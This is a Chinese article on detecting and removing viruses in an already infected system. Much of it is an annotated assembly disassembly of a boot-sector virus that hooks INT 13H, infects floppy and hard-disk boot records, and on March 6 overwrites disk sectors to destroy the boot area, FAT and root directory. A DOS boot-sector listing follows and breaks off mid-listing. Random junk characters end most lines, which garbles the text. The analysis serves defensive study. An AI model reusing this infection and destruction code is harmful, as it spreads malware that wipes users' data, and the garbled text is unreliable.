近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 TB%NHq-!
?? 2)\gIMt%
?? 一 、 带毒环境下检测清除病毒的意义 u$Wv*;TT%
?? sLOkLz"x
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 :5-t$^R
?? ;39~G T
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 uE ^uP@d
?? Swxur+hfH
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 $lAQcG&Q
?? q |Orv=v
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 @#>YU
?? ($X2SIZh
?? 二 、带毒环境下检测清除病毒的原理 }I"k=>Ycns
?? r]B`\XWz
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 6sQY)F7p
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 (Rs|"];?Z
l|S_10x5
}08Sv=XM
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " 68()2v4X
病毒体: G2s2i2&6E
JMP 01AF ;JMP到01AF \^3cNw
DB 00 ;病毒标计 @M)"
DW 00F5 ;此为搬到高位址后,远程跳转指令 FwpTQix!
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX W5(.Hub}
DB 02 w gkY\Q
DW 0003 ;此为软盘识别标记,硬盘为0007 5`FPv4
DW EC59 ; *s%M!YM
DW F000 ;INT 13H的原入口 5,#aN}v#?
. 9zNMv-
. APv&
^\oUH
. &`2$,zX#
. LJwy,-
. _X~xfmU
XOR AX,AX ;清除AX r<1.'F
MOV DS,AX; ;让DS=0000 /y3Lc.-
CLI ;清I标志积存器 A(1WQUu j
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 M=sGPPj
MOV AX,7C00 ;后载入引导分区表的地址,目前地址
(2dkmn
MOV SP,AX ;开机时为0000:7CB6 THcX.%ToT
STI ;设I标志积存器 B42qiV2/k
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A jyFKO[s\X
PUSH AX ;用RETF,把程序转到引导或分区表位置 av>Ff6w)Y
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 .F]"%RK[
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在
<y<
MOV AX,[004E] ;取INT 13H的段地址 ja%IGaH;s
MOV [7C0C],AX ;存到010C l:14uWu|
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 eEX* \1Gg
;读写以便传播发作 0I}c|V'P
.|/VD'xV"
MOV AX,[0413] ;取得内存K数,放在AX =GL^tAUJ
DEC AX ; 1$nuh@-ys
DEC AX ;减2k内存 iHk/#a
MOV [0413],AX ;存回,通常是638K '"9Wt@
.
MOV CL,06 ; +-PFISa<r
SHL AX,CL ; O6b.oS'-
MOV ES,AX ;算出减2K后病毒本体的位址 %TDY &@i=
MOV [7C05],AX ;AX存入0105 9)S,c=z83
Vy+kq_9
;病毒常用手法将系统高段内存减少以便驻留 }_h2:^n
;这样可以免于被其他程序覆盖 ,h},jkY4
/MbWS(RT
MOV AX,000E ;病毒拦INT 13H 1v'|%B;O
;ISR起始的偏移量 K[[ 5H
MOV [004C],AX ; 4Ep6vm X
MOV [004E],ES ;设原为病毒的INT 13H L[. )!c8k
MOV CX,01BE ;病毒长度为1BE zC WN,K`
MOV SI,7C00 ;从JMP 01AF开始 wT&P].5n
XOR DI,DI ;DI=0 >_u5"&q
CLD ;清方向标志 DxzNg_E]
REPZ; <]u]rZc$
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或
hOr4C4
CS: ;分区表能载入0000:7C00正常运作 7D=gAMPvJ
JMP FAR [7C03] ;跳到为搬过后的位址 2T-3rC)
XOR AX,AX ;清AX ]Vd1fkXO0
MOV ES,AX ;ES=0000 8M6Qn7{L
INT 13 ;复位磁盘 ,Ad{k
PUSH CS ; VcORRUp
POP DS ;让DS=CS HC
RmW'
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 uE&2M>2
MOV BX,7C00 ;读到0000:7C00 Ta)6ly7'
MOV CX,[0008] ;硬盘第0道,第7扇区 |K'7BK_^J
CMP CX,+07 ;比较是否从硬盘启动 7KZ>x*o
JNZ 0213 ;不是跳0213 S,GM!YZg
MOV DX,0080 ;第一硬盘C:第零面 10ZL-7D#m
INT 13 ;用INT 13号中断,读 +5ue)`
JMP 023E ;跳023E比较日期,发作或正常开机 VR vX^w0
MOV CX,[0008] ;软盘0道,第3扇区 vve[.Lud'
MOV DX,0100 ;A:的第0面 F=V_ACU
INT 13 ;INT 13读盘 B0ZLGB
JB 023E ;失败跳023E zF_aJ+i:~
PUSH CS ^e:rRk7 &
POPES ;让ES=CS M%N_4j.
MOV AX,0201 ; "/zDcZbL;
MOV BX,0200 ; E)%r}4u>
MOV CX,0001 ; )B5(V5-!|
MOV DX,0080 ; nm
!H<
INT 13 ;读入C:的分区表到0200,以便下面比较 b)+;@wa~
JB 023E ;失败跳023E z{G@t0q
XOR SI,SI ;清SI i&zJwUr(<
CLD ;清方向标志以便比较 Wfj*)j
Q
LODSW ;载入一个WORD到AX 3R[,,WAj$
CMP AX,[BX] ;比较有无病毒存在..E9AC H
JjW
JNZ 0287 ;没有则跳0287传染 <'92\O
LODSW ;载入一个WORD到AX =d1i<iw?-
CMP AX,[BX+02] ;再次确认..0000 9 p`|~^X
JNZ 0287 ;没有跳0287 r]O8|#P,Z$
XOR CX,CX ;清CX )Ga 3Ji}'
MOV AH,04 ; KL+, [M@ F
INT 1A ;取得日期 i`vgD<}
CMP DX,0306 ;是否为三月六日 B{-+1f4
JZ 024B ;是跳024B传染 'H)l~L
RETF ;把程序交还给引导启动完成 uz@WW!+o
?ubIh.d
步骤4:病毒INT 13代码分析 U66 zm9
3&
方法:U q-nM]Gm
PUSH DS ;首先把要用到积存器 "(^1Dm$(
PUSH AX ;入栈保存 Iw;J7[hJ&$
OR DL,DL ;比较是否为软盘 5JA5:4aev
JNZ 002F ;如不是则退出传染
u9,ZY>
XOR AX,AX ;AX=0 KI8Q
=*
MOV DS,AX ;数据代段=0 qh~S)^zFJ
TEST BYTE PTR [043F],01 ;比较是否为A盘 rR3(yy0L
JNZ 002F ;不是则退出 Tp
fC
POP AX ;将以上保存积存器 Mf.:y
POP DS ;弹栈恢复 =]hPX
PUSHF ;压栈标志积存器 =U<6TP]{
CS: ;以便执行原INT 13 Zmr*$,v<y
CALL FAR [000A] ;执行原INT 13 sp&)1?!M
PUSHF ;再次压栈 bx%P-r31
CALL 0036 ;以便跳转到传染程序 t 4tXLI;'
POPF ;跳转到执行传染 2 NrMse
RETF 0002 ;结束中断调用返回 H2D j`0
POP AX ;恢复 ^g*2jH+
POP DS ;堆栈 4@ =l'Fw
CS: ;跳转到原正常INT 13 mp+lN:
JMP FAR [000A] ;地址执行 a>/jW-?
2=ZZR8v
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 _+x&[^gjP
o9D]\PdL>
步骤5:传染过程分析 F` gQ[
方法:U $XO#qOW
对软盘传染过程: Z|dng6ck
PUSH AX ;工 4.0JgX
PUSH BX ;作 B:QAG
PUSH CX ;寄 O)WduhlGQ
PUSH DX ;存 YF(TG]?6
PUSH DS ;器 UXN!iU)
PUSH ES ;入 Y]!{
nW
PUSH SI ;栈 T<=]Vg)^r"
PUSH DI ;保存 )4/227b/(
PUSH CS ;以压/弹栈方式 7SpF&
POP DS ;使数据段DS和 pCm |t!,
PUSH CS ;附加段ES均指向 iPoDesp
POP ES ;代码段CS (>gAnebN
L
MOV SI,0004 ;试4次 ^GN |}W
MOV AX,0201 ;设置各 3~Vo]wv
MOV BX,0200 ;积存器 X1{U''$
K
MOV CX,0001 ;为读软盘 cWG?`6xU&
XOR DX,DX ;引导扇区做准备 STH?X]
/
PUSHF ;压栈标志积存器 qX?k]m
CALL FAR [000A] ;正常的INT 13调用 nkvkHh
JNB 0063 ;成功则转判断 rlIDym9nY~
XOR AX,AX ;不成功复位 {=GWQn6cc
PUSHF ;磁盘继续读 fb||q-E
CALL FAR [000A] ;如果4次 6su^yt
DEC SI ;均匀不成功 -H;p +XAY
JNZ 0045 ;则退出跳转 ]$gBX=
JMP 00A6 ;退出传染 @(_M\>!%M
XOR SI,SI ;SI=0以便用 fooQqWC)
CLD ;LODSW读入软盘 GMO|A.bzzN
LODSW ;第1或第2字进行比较 .|g67PH=
CMP AX,[BX] ;比较如果不包含病毒标志 drZ1D s
JNZ 0071 ;则跳转写传染 V`MV_zA2
LODSW ;如果已有标志 xX]92Q
CMP AX,[BX+02] ;则退出 }R -azN;
JZ 00A6 ;传染子程序 p|b&hgA
MOV AX,0301 ;为写盘准备 y $K#M
MOV DH,01 ;如果是360K h"~GaI
MOV CL,03 ;则写到1面0道3扇区 R0!qweGi@
CMP BYTE PTR [BX+15],FD ;比较软盘 ~J:"sUR
JZ 0080 ;如果大于360K R^=)Ucj
MOV CL,0E ;写到1面0道14扇区 (ON_(MN
MOV [0008],CX ;写病毒标志到软盘 j.L`@
PUSHF ;调用原INT 13 D3+UV+&R/
CALL FAR [000A] ;进行传染 xRx8E;Q@h?
JB 00A6 H _%yh,L
MOV SI,03BE ;以下是将正常 VD*xhuy$k
MOV DI,01BE ;引导扇区从 ix=H=U]Q{
MOV CX,0021 ;1BE起的21字节内容 :U7m@3czU
CLD ;搬移到病毒程序尾部 P_f>a?OL:
REPZ ;开始复制 )=)=]|3
MOVSW #n_uELE
MOV AX,0301 ;写盘功能调用,写一个扇区 wEImpsC`
XOR BX,BX ;将病毒程序 u*NU MT2
MOV CX,0001 ;写入软盘引导扇区内 ^Q\O8f[u
XOR DX,DX ;设置为软盘 yb(zyGe
PUSHF ages-Z_X
CALL FAR [000A] ;执行正常INT 13调用写盘 oqOXRUy
POP DI ;将 -gP4| r8&
POP SI ;工 !hJ%
:^ xL
POP ES ;作 mfNYN4Um6
POP DS ;寄 Fq<;-
POP DX ;存 2-3|0<`
POP CX ;器 *\i<+~I@l
POP BX ;退 /}Z0\,
POP AX ;栈 nPj+mg
RET ;返回调用处 8'(|1
对硬盘传染过程: |H)WJ/`
MOV CX,0007 ;第7扇区 :%?\Wj5HW
MOV [0008],CX ;此处为硬盘引导标记 |$vhu`]Z@^
MOV AX,301 ;写功能调用 I=,u7w`m
MOV DX,0080 ;设置为硬盘 cO#e
AQf7
INT 13 ;将正常引导扇区写到0面0道7扇区内 96.A8o
JB 13E ;失败则转 v&>TU(x\H
MOV SI,03BE ;原分区表地址 Z-!W#
MOV DI,01BE ;目标地址 UJ'}p&E
MOV CX,0021 ;整个分区表 H...!c1M@
REPNZ ?V}AwLX}
MOVSW ;开始复制 ^'|\8
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 VvO/
;这样在分析着查看硬盘分区信息时仍能看到该部分 -k19BDJ,W
;内容,以次来麻痹分析者 hk O)q|1
MOV AX,0301 ;准备写病毒提进硬盘 +C{ %pF
XOR BX,BX ;病毒体位置 [akyCb
INC CL ;第一扇区 Us]Uy|j
INT 13 ;开始写盘传染 cXO_g!&2A
JMP 013E ;转到13E处判断是否为3月6日,是则发作 ZZa$/q"
z.9
#AN=&[
步骤6:破坏过程分析 AID}NQQj_
方法:U ^%v<I"<Uq5
主要分析对硬盘数据破坏: xpf\S10e
. 3eV(2
. 43mV ~Oj
. 6'M"-9?G
. `3$S^|v
. 'CDRb3w}B
MOV DL,80 [1Dg_>lz
MOV BYTE PTR[0007],04 $?OuY*ZeY9
;准备写硬盘 a/.O,&3
MOV AL,11 ;写17个扇区 eTc0u;{V
MOV BX,5000 )p MZ5|+X
MOV ES,BX ;从内存ES:5000中处开始写 VK+#!!Ha
INT 13 ;残不人睹 z^/aJ@gQ
JNB 0179 ;成功转179继续写 P^%.7C
XOR AH,AH -4p^wNR
INT 13 ;不成功复位磁盘继续 1u\fLAXn
INC DH ;使写操作磁头加1继续? .&ynS
CMP DH,[0007] ;比较是否小于0007单元值 h-1eDxK6
JB 0150 ;是则返回开始处继续写 sa~.qmqu
XOR DH,DH ;DH=0 \jdpL1
INC CH ;再加扇区 EiY i<Z_S
JMP 0150 ;反回继续写 urHQb5|T}
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 Zcg=a_
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 )>)_>[
;和文件分配表。 K%<Z"2!+
<!\J([NM8
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 Riq5Au?*)
读盘的时将自身写入磁盘。 I3xx}^V
引导过程如下: :8;8-c
1>调整堆栈位置 a#=GLB_P(
2>修改并用修改后的磁盘参数表来复位磁盘系统 f 8E
S
GU
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 u OEFb
4>读入根目录表的首扇区 ;APpgt4
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS 46'EZ@#s
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 %}G:R!4 d
7>跳到0000:0700H处执行IO.SYS,引导完毕 HFwT
003E FA CLI V%pdXM5
003F 33C0 XOR AX,AX )gNHD?4x
0041 8ED0 MOV SS,AX :~ 3/
0041 8ED0 MOV SS,AX |WeLmy%9
0043 BC007C MOV SP,7C00 ; 初始化堆栈 r4O*0Q_
0046 16 PUSH SS ?-O(EY1E
0047 07 POP ES ;(ES)=0000H ^/HE_keY
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H uU`zbh}]L.
004B 36 SS: ;(SS)=0000H (tEW#l'}
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI S8" h9|
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 EX8:B.z`57
004F 56 PUSH SI ;取到后压入堆栈中保存 J#CF S G
0050 16 PUSH SS t=~5I>
0051 53 PUSH BX ;保存地址0000:0078H nTjQ4y
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 .1MXQLy
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 EOV<|WF>
0058 FC CLD =o=)EU{~
0059 F3 REPZ =,I,K=+_x
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 @4_CR
005B 06 PUSH ES 9dw02bY`
005C 1F POP DS ;(DS)=0000H ||7r'Q
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" tkWWR%c"
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" aO'$}rDf$
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" }rVnuRq
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) t09,X
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 oZ%t! Fl1
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 rQK2&37-,@
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 tiwhG%?2
0072 7279 JB 00ED ;出错则转出错处理 }6eWdm!B
n$}c+1
; 下面一段程序计算扇区位置 P/t$xqAL
0074 33C0 XOR AX,AX A]BD2
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 F1?@tcr'
007A 7408 JZ 0084 ;为零表示大硬盘? <